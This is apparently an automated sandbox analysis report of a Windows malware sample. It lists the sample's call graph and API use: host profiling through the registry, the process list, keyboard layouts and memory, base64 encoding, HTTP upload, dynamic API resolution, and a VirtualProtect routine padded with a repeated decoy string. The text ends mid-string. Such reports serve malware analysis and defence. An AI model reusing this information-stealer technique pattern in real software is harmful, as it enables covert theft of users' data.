lstrcpy 15296->15297 15298 8c24b7 15297->15298 15840 8c8320 15298->15840 15300 8c24d3 15301 8ca920 3 API calls 15300->15301 15302 8c24e6 15301->15302 15303 8ca8a0 lstrcpy 15302->15303 15304 8c24ef 15303->15304 15305 8ca9b0 4 API calls 15304->15305 15306 8c2519 15305->15306 15307 8ca8a0 lstrcpy 15306->15307 15308 8c2522 15307->15308 15309 8ca9b0 4 API calls 15308->15309 15310 8c2543 15309->15310 15311 8ca8a0 lstrcpy 15310->15311 15312 8c254c 15311->15312 15313 8c8320 17 API calls 15312->15313 15314 8c2568 15313->15314 15315 8ca920 3 API calls 15314->15315 15316 8c257b 15315->15316 15317 8ca8a0 lstrcpy 15316->15317 15318 8c2584 15317->15318 15319 8ca9b0 4 API calls 15318->15319 15320 8c25ae 15319->15320 15321 8ca8a0 lstrcpy 15320->15321 15322 8c25b7 15321->15322 15323 8ca9b0 4 API calls 15322->15323 15324 8c25d6 15323->15324 15325 8ca8a0 lstrcpy 15324->15325 15326 8c25df 15325->15326 15327 8ca9b0 4 API calls 15326->15327 15328 8c2600 15327->15328 15329 8ca8a0 lstrcpy 15328->15329 15330 8c2609 15329->15330 15876 8c8680 15330->15876 15332 8c2620 15333 8ca920 3 API calls 15332->15333 15334 8c2633 15333->15334 15335 8ca8a0 lstrcpy 15334->15335 15336 8c263c 15335->15336 15337 8c265a lstrlen 15336->15337 15338 8c266a 15337->15338 15339 8ca740 lstrcpy 15338->15339 15340 8c267c 15339->15340 15341 8b1590 lstrcpy 15340->15341 15342 8c268d 15341->15342 15886 8c5190 15342->15886 15344 8c2699 15344->13776 16074 8caad0 15345->16074 15347 8b5009 InternetOpenUrlA 15350 8b5021 15347->15350 15348 8b502a InternetReadFile 15348->15350 15349 8b50a0 InternetCloseHandle InternetCloseHandle 15351 8b50ec 15349->15351 15350->15348 15350->15349 15351->13780 16075 8b98d0 15352->16075 15354 8c0759 15355 8c077d 15354->15355 15356 8c0a38 15354->15356 15358 8c0799 StrCmpCA 15355->15358 15357 8b1590 lstrcpy 15356->15357 15359 8c0a49 15357->15359 15360 8c07a8 15358->15360 15361 8c0843 15358->15361 16251 8c0250 15359->16251 15363 8ca7a0 lstrcpy 15360->15363 15366 8c0865 StrCmpCA 15361->15366 15365 8c07c3 15363->15365 15367 8b1590 lstrcpy 15365->15367 15368 8c0874 15366->15368 15404 8c096b 15366->15404 15370 8c080c 15367->15370 15369 8ca740 lstrcpy 15368->15369 15371 8c0881 15369->15371 15372 8ca7a0 lstrcpy 15370->15372 15376 8ca9b0 4 API calls 15371->15376 15377 8c0823 15372->15377 15373 8c099c StrCmpCA 15374 8c09ab 15373->15374 15375 8c0a2d 15373->15375 15378 8b1590 lstrcpy 15374->15378 15375->13784 15379 8c08ac 15376->15379 15380 8ca7a0 lstrcpy 15377->15380 15381 8c09f4 15378->15381 15382 8ca920 3 API calls 15379->15382 15383 8c083e 15380->15383 15384 8ca7a0 lstrcpy 15381->15384 15385 8c08b3 15382->15385 16078 8bfb00 15383->16078 15387 8c0a0d 15384->15387 15388 8ca9b0 4 API calls 15385->15388 15389 8ca7a0 lstrcpy 15387->15389 15390 8c08ba 15388->15390 15391 8c0a28 15389->15391 15404->15373 15726 8ca7a0 lstrcpy 15725->15726 15727 8b1683 15726->15727 15728 8ca7a0 lstrcpy 15727->15728 15729 8b1695 15728->15729 15730 8ca7a0 lstrcpy 15729->15730 15731 8b16a7 15730->15731 15732 8ca7a0 lstrcpy 15731->15732 15733 8b15a3 15732->15733 15733->14607 15735 8b47c6 15734->15735 15736 8b4838 lstrlen 15735->15736 15760 8caad0 15736->15760 15738 8b4848 InternetCrackUrlA 15739 8b4867 15738->15739 15739->14684 15741 8ca740 lstrcpy 15740->15741 15742 8c8b74 15741->15742 15743 8ca740 lstrcpy 15742->15743 15744 8c8b82 GetSystemTime 15743->15744 15745 8c8b99 15744->15745 15746 8ca7a0 lstrcpy 15745->15746 15747 8c8bfc 15746->15747 15747->14699 15749 8ca931 15748->15749 15750 8ca988 15749->15750 15753 8ca968 lstrcpy lstrcat 15749->15753 15751 8ca7a0 lstrcpy 15750->15751 15752 8ca994 15751->15752 15752->14702 15753->15750 15754->14817 15756 8b4eee 15755->15756 15757 8b9af9 LocalAlloc 15755->15757 15756->14705 15756->14707 15757->15756 15758 8b9b14 CryptStringToBinaryA 15757->15758 15758->15756 15759 8b9b39 LocalFree 15758->15759 15759->15756 15760->15738 15761->14827 15762->14968 15763->14970 15764->14978 15893 8c77a0 15765->15893 15768 8c1c1e 15768->15060 15769 8c76c6 RegOpenKeyExA 15770 8c7704 RegCloseKey 15769->15770 15771 8c76e7 RegQueryValueExA 15769->15771 15770->15768 15771->15770 15773 8c1c99 15772->15773 15773->15074 15775 8c1e09 15774->15775 15775->15116 15777 8c7a9a wsprintfA 15776->15777 15778 8c1e84 15776->15778 15777->15778 15778->15130 15780 8c7b4d 15779->15780 15781 8c1efe 15779->15781 15900 8c8d20 LocalAlloc CharToOemW 15780->15900 15781->15144 15784 8ca740 lstrcpy 15783->15784 15785 8c7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15784->15785 15794 8c7c25 15785->15794 15786 8c7d18 15788 8c7d1e LocalFree 15786->15788 15789 8c7d28 15786->15789 15787 8c7c46 GetLocaleInfoA 15787->15794 15788->15789 15791 8ca7a0 lstrcpy 15789->15791 15790 8ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15790->15794 15792 8c7d37 15791->15792 15792->15157 15793 8ca8a0 lstrcpy 15793->15794 15794->15786 15794->15787 15794->15790 15794->15793 15796 8c2008 15795->15796 15796->15172 15798 8c94b5 15797->15798 15799 8c9493 GetModuleFileNameExA CloseHandle 15797->15799 15800 8ca740 lstrcpy 15798->15800 15799->15798 15801 8c2091 15800->15801 15801->15187 15803 8c7e68 RegQueryValueExA 15802->15803 15804 8c2119 15802->15804 15805 8c7e8e RegCloseKey 15803->15805 15804->15201 15805->15804 15807 8c7fb9 GetLogicalProcessorInformationEx 15806->15807 15808 8c7fd8 GetLastError 15807->15808 15809 8c8029 15807->15809 15810 8c8022 15808->15810 15818 8c7fe3 15808->15818 15815 8c89f0 2 API calls 15809->15815 15811 8c2194 15810->15811 15814 8c89f0 2 API calls 15810->15814 15811->15215 15814->15811 15816 8c807b 15815->15816 15816->15810 15817 8c8084 wsprintfA 15816->15817 15817->15811 15818->15807 15818->15811 15901 8c89f0 15818->15901 15904 8c8a10 GetProcessHeap RtlAllocateHeap 15818->15904 15820 8c220f 15819->15820 15820->15229 15822 8c89b0 15821->15822 15823 8c814d GlobalMemoryStatusEx 15822->15823 15824 8c8163 __aulldiv 15823->15824 15825 8c819b wsprintfA 15824->15825 15826 8c2289 15825->15826 15826->15243 15828 8c87fb GetProcessHeap RtlAllocateHeap wsprintfA 15827->15828 15830 8ca740 lstrcpy 15828->15830 15831 8c230b 15830->15831 15831->15257 15833 8ca740 lstrcpy 15832->15833 15834 8c8229 15833->15834 15835 8c8263 15834->15835 15838 8ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15834->15838 15839 8ca8a0 lstrcpy 15834->15839 15836 8ca7a0 lstrcpy 15835->15836 15837 8c82dc 15836->15837 15837->15274 15838->15834 15839->15834 15841 8ca740 lstrcpy 15840->15841 15842 8c835c RegOpenKeyExA 15841->15842 15843 8c83ae 15842->15843 15844 8c83d0 15842->15844 15845 8ca7a0 lstrcpy 15843->15845 15846 8c83f8 RegEnumKeyExA 15844->15846 15847 8c8613 RegCloseKey 15844->15847 15857 8c83bd 15845->15857 15848 8c860e 15846->15848 15849 8c843f wsprintfA RegOpenKeyExA 15846->15849 15850 8ca7a0 lstrcpy 15847->15850 15848->15847 15851 8c8485 RegCloseKey RegCloseKey 15849->15851 15852 8c84c1 RegQueryValueExA 15849->15852 15850->15857 15855 8ca7a0 lstrcpy 15851->15855 15853 8c84fa lstrlen 15852->15853 15854 8c8601 RegCloseKey 15852->15854 15853->15854 15856 8c8510 15853->15856 15854->15848 15855->15857 15858 8ca9b0 4 API calls 15856->15858 15857->15300 15859 8c8527 15858->15859 15860 8ca8a0 lstrcpy 15859->15860 15861 8c8533 15860->15861 15862 8ca9b0 4 API calls 15861->15862 15863 8c8557 15862->15863 15864 8ca8a0 lstrcpy 15863->15864 15865 8c8563 15864->15865 15866 8c856e RegQueryValueExA 15865->15866 15866->15854 15867 8c85a3 15866->15867 15868 8ca9b0 4 API calls 15867->15868 15869 8c85ba 15868->15869 15870 8ca8a0 lstrcpy 15869->15870 15871 8c85c6 15870->15871 15872 8ca9b0 4 API calls 15871->15872 15873 8c85ea 15872->15873 15874 8ca8a0 lstrcpy 15873->15874 15875 8c85f6 15874->15875 15875->15854 15877 8ca740 lstrcpy 15876->15877 15878 8c86bc CreateToolhelp32Snapshot Process32First 15877->15878 15879 8c875d CloseHandle 15878->15879 15880 8c86e8 Process32Next 15878->15880 15881 8ca7a0 lstrcpy 15879->15881 15880->15879 15884 8c86fd 15880->15884 15883 8c8776 15881->15883 15882 8ca9b0 lstrcpy lstrlen lstrcpy lstrcat 15882->15884 15883->15332 15884->15880 15884->15882 15885 8ca8a0 lstrcpy 15884->15885 15885->15884 15887 8ca7a0 lstrcpy 15886->15887 15888 8c51b5 15887->15888 15889 8b1590 lstrcpy 15888->15889 15890 8c51c6 15889->15890 15905 8b5100 15890->15905 15892 8c51cf 15892->15344 15896 8c7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15893->15896 15895 8c76b9 15895->15768 15895->15769 15897 8c7765 RegQueryValueExA 15896->15897 15898 8c7780 RegCloseKey 15896->15898 15897->15898 15899 8c7793 15898->15899 15899->15895 15900->15781 15902 8c8a0c 15901->15902 15903 8c89f9 GetProcessHeap HeapFree 15901->15903 15902->15818 15903->15902 15904->15818 15906 8ca7a0 lstrcpy 15905->15906 15907 8b5119 15906->15907 15908 8b47b0 2 API calls 15907->15908 15909 8b5125 15908->15909 16065 8c8ea0 15909->16065 15911 8b5184 15912 8b5192 lstrlen 15911->15912 15913 8b51a5 15912->15913 15914 8c8ea0 4 API calls 15913->15914 15915 8b51b6 15914->15915 15916 8ca740 lstrcpy 15915->15916 15917 8b51c9 15916->15917 15918 8ca740 lstrcpy 15917->15918 15919 8b51d6 15918->15919 15920 8ca740 lstrcpy 15919->15920 15921 8b51e3 15920->15921 15922 8ca740 lstrcpy 15921->15922 15923 8b51f0 15922->15923 15924 8ca740 lstrcpy 15923->15924 15925 8b51fd InternetOpenA StrCmpCA 15924->15925 15926 8b522f 15925->15926 15927 8b58c4 InternetCloseHandle 15926->15927 15928 8c8b60 3 API calls 15926->15928 15934 8b58d9 ctype 15927->15934 15929 8b524e 15928->15929 15930 8ca920 3 API calls 15929->15930 15931 8b5261 15930->15931 15932 8ca8a0 lstrcpy 15931->15932 15933 8b526a 15932->15933 15935 8ca9b0 4 API calls 15933->15935 15937 8ca7a0 lstrcpy 15934->15937 15936 8b52ab 15935->15936 15938 8ca920 3 API calls 15936->15938 15946 8b5913 15937->15946 15939 8b52b2 15938->15939 15940 8ca9b0 4 API calls 15939->15940 15941 8b52b9 15940->15941 15942 8ca8a0 lstrcpy 15941->15942 15943 8b52c2 15942->15943 15944 8ca9b0 4 API calls 15943->15944 15945 8b5303 15944->15945 15947 8ca920 3 API calls 15945->15947 15946->15892 15948 8b530a 15947->15948 15949 8ca8a0 lstrcpy 15948->15949 15950 8b5313 15949->15950 15951 8b5329 InternetConnectA 15950->15951 15951->15927 15952 8b5359 HttpOpenRequestA 15951->15952 15954 8b58b7 InternetCloseHandle 15952->15954 15955 8b53b7 15952->15955 15954->15927 15956 8ca9b0 4 API calls 15955->15956 15957 8b53cb 15956->15957 15958 8ca8a0 lstrcpy 15957->15958 15959 8b53d4 15958->15959 15960 8ca920 3 API calls 15959->15960 15961 8b53f2 15960->15961 15962 8ca8a0 lstrcpy 15961->15962 15963 8b53fb 15962->15963 15964 8ca9b0 4 API calls 15963->15964 15965 8b541a 15964->15965 15966 8ca8a0 lstrcpy 15965->15966 15967 8b5423 15966->15967 15968 8ca9b0 4 API calls 15967->15968 15969 8b5444 15968->15969 15970 8ca8a0 lstrcpy 15969->15970 15971 8b544d 15970->15971 15972 8ca9b0 4 API calls 15971->15972 15973 8b546e 15972->15973 15974 8ca8a0 lstrcpy 15973->15974 16066 8c8ead CryptBinaryToStringA 16065->16066 16067 8c8ea9 16065->16067 16066->16067 16068 8c8ece GetProcessHeap RtlAllocateHeap 16066->16068 16067->15911 16068->16067 16069 8c8ef4 ctype 16068->16069 16070 8c8f05 CryptBinaryToStringA 16069->16070 16070->16067 16074->15347 16317 8b9880 16075->16317 16077 8b98e1 16077->15354 16079 8ca740 lstrcpy 16078->16079 16252 8ca740 lstrcpy 16251->16252 16253 8c0266 16252->16253 16254 8c8de0 2 API calls 16253->16254 16255 8c027b 16254->16255 16256 8ca920 3 API calls 16255->16256 16257 8c028b 16256->16257 16258 8ca8a0 lstrcpy 16257->16258 16259 8c0294 16258->16259 16260 8ca9b0 4 API calls 16259->16260 16261 8c02b8 16260->16261 16318 8b988e 16317->16318 16321 8b6fb0 16318->16321 16320 8b98ad ctype 16320->16077 16324 8b6d40 16321->16324 16325 8b6d63 16324->16325 16326 8b6d59 16324->16326 16340 8b6530 16325->16340 16326->16320 16330 8b6dbe 16330->16326 16350 8b69b0 16330->16350 16332 8b6e2a 16332->16326 16333 8b6ee6 VirtualFree 16332->16333 16335 8b6ef7 16332->16335 16333->16335 16334 8b6f41 16334->16326 16336 8c89f0 2 API calls 16334->16336 16335->16334 16337 8b6f38 16335->16337 16338 8b6f26 FreeLibrary 16335->16338 16336->16326 16339 8c89f0 2 API calls 16337->16339 16338->16335 16339->16334 16341 8b6542 16340->16341 16343 8b6549 16341->16343 16360 8c8a10 GetProcessHeap RtlAllocateHeap 16341->16360 16343->16326 16344 8b6660 16343->16344 16347 8b668f VirtualAlloc 16344->16347 16346 8b6730 16348 8b673c 16346->16348 16349 8b6743 VirtualAlloc 16346->16349 16347->16346 16347->16348 16348->16330 16349->16348 16351 8b69c9 16350->16351 16355 8b69d5 16350->16355 16352 8b6a09 LoadLibraryA 16351->16352 16351->16355 16353 8b6a32 16352->16353 16352->16355 16357 8b6ae0 16353->16357 16361 8c8a10 GetProcessHeap RtlAllocateHeap 16353->16361 16355->16332 16356 8b6ba8 GetProcAddress 16356->16355 16356->16357 16357->16355 16357->16356 16358 8c89f0 2 API calls 16358->16357 16359 8b6a8b 16359->16355 16359->16358 16360->16343 16361->16359

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 8c9860-8c9874 call 8c9750 663 8c987a-8c9a8e call 8c9780 GetProcAddress * 21 660->663 664 8c9a93-8c9af2 LoadLibraryA * 5 660->664 663->664 666 8c9b0d-8c9b14 664->666 667 8c9af4-8c9b08 GetProcAddress 664->667 669 8c9b46-8c9b4d 666->669 670 8c9b16-8c9b41 GetProcAddress * 2 666->670 667->666 671 8c9b4f-8c9b63 GetProcAddress 669->671 672 8c9b68-8c9b6f 669->672 670->669 671->672 673 8c9b89-8c9b90 672->673 674 8c9b71-8c9b84 GetProcAddress 672->674 675 8c9bc1-8c9bc2 673->675 676 8c9b92-8c9bbc GetProcAddress * 2 673->676 674->673 676->675
                                APIs
                                • GetProcAddress.KERNEL32(76F70000,007B0708), ref: 008C98A1
                                • GetProcAddress.KERNEL32(76F70000,007B0720), ref: 008C98BA
                                • GetProcAddress.KERNEL32(76F70000,007B0540), ref: 008C98D2
                                • GetProcAddress.KERNEL32(76F70000,007B0570), ref: 008C98EA
                                • GetProcAddress.KERNEL32(76F70000,007B0738), ref: 008C9903
                                • GetProcAddress.KERNEL32(76F70000,007B8B18), ref: 008C991B
                                • GetProcAddress.KERNEL32(76F70000,007A6440), ref: 008C9933
                                • GetProcAddress.KERNEL32(76F70000,007A6360), ref: 008C994C
                                • GetProcAddress.KERNEL32(76F70000,007B0768), ref: 008C9964
                                • GetProcAddress.KERNEL32(76F70000,007B0780), ref: 008C997C
                                • GetProcAddress.KERNEL32(76F70000,007B07C8), ref: 008C9995
                                • GetProcAddress.KERNEL32(76F70000,007B05B8), ref: 008C99AD
                                • GetProcAddress.KERNEL32(76F70000,007A6200), ref: 008C99C5
                                • GetProcAddress.KERNEL32(76F70000,007B07E0), ref: 008C99DE
                                • GetProcAddress.KERNEL32(76F70000,007B07F8), ref: 008C99F6
                                • GetProcAddress.KERNEL32(76F70000,007A6380), ref: 008C9A0E
                                • GetProcAddress.KERNEL32(76F70000,007B0510), ref: 008C9A27
                                • GetProcAddress.KERNEL32(76F70000,007B0810), ref: 008C9A3F
                                • GetProcAddress.KERNEL32(76F70000,007A61C0), ref: 008C9A57
                                • GetProcAddress.KERNEL32(76F70000,007B0828), ref: 008C9A70
                                • GetProcAddress.KERNEL32(76F70000,007A6220), ref: 008C9A88
                                • LoadLibraryA.KERNEL32(007B0858,?,008C6A00), ref: 008C9A9A
                                • LoadLibraryA.KERNEL32(007B0840,?,008C6A00), ref: 008C9AAB
                                • LoadLibraryA.KERNEL32(007B08D0,?,008C6A00), ref: 008C9ABD
                                • LoadLibraryA.KERNEL32(007B0870,?,008C6A00), ref: 008C9ACF
                                • LoadLibraryA.KERNEL32(007B0888,?,008C6A00), ref: 008C9AE0
                                • GetProcAddress.KERNEL32(76DA0000,007B08A0), ref: 008C9B02
                                • GetProcAddress.KERNEL32(75840000,007B08B8), ref: 008C9B23
                                • GetProcAddress.KERNEL32(75840000,007B8E68), ref: 008C9B3B
                                • GetProcAddress.KERNEL32(753A0000,007B8D30), ref: 008C9B5D
                                • GetProcAddress.KERNEL32(77300000,007A6340), ref: 008C9B7E
                                • GetProcAddress.KERNEL32(774D0000,007B89E8), ref: 008C9B9F
                                • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 008C9BB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: bz$@cz$@dz$NtQueryInformationProcess$`cz
                                • API String ID: 2238633743-4183257078
                                • Opcode ID: d8fad22eec35de99e584ca8ed679c8becd86fbbc8a08cbbdd197a5753f1746f7
                                • Instruction ID: b97f877214e1f3ceb7ae826b7c3eb6273095f67e1304805283b69de7f9ec39ca
                                • Opcode Fuzzy Hash: d8fad22eec35de99e584ca8ed679c8becd86fbbc8a08cbbdd197a5753f1746f7
                                • Instruction Fuzzy Hash: 8AA11CF66002419FD344EFE9ED88EF677F9F768381704851AA60DC3264D679A843CB92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 8b45c0-8b4695 RtlAllocateHeap 781 8b46a0-8b46a6 764->781 782 8b474f-8b47a9 VirtualProtect 781->782 783 8b46ac-8b474a 781->783 783->781
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B460F
                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 008B479C
                                Strings
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4729
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4617
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46C2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B473F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46B7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4643
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45C7
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B462D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4683
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45E8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4657
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B475A
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4622
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4734
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B474F
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B471E
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46CD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45DD
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4678
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4662
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4765
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45F3
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B45D2
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B466D
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46AC
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B46D8
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B477B
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4638
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4713
                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 008B4770
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by 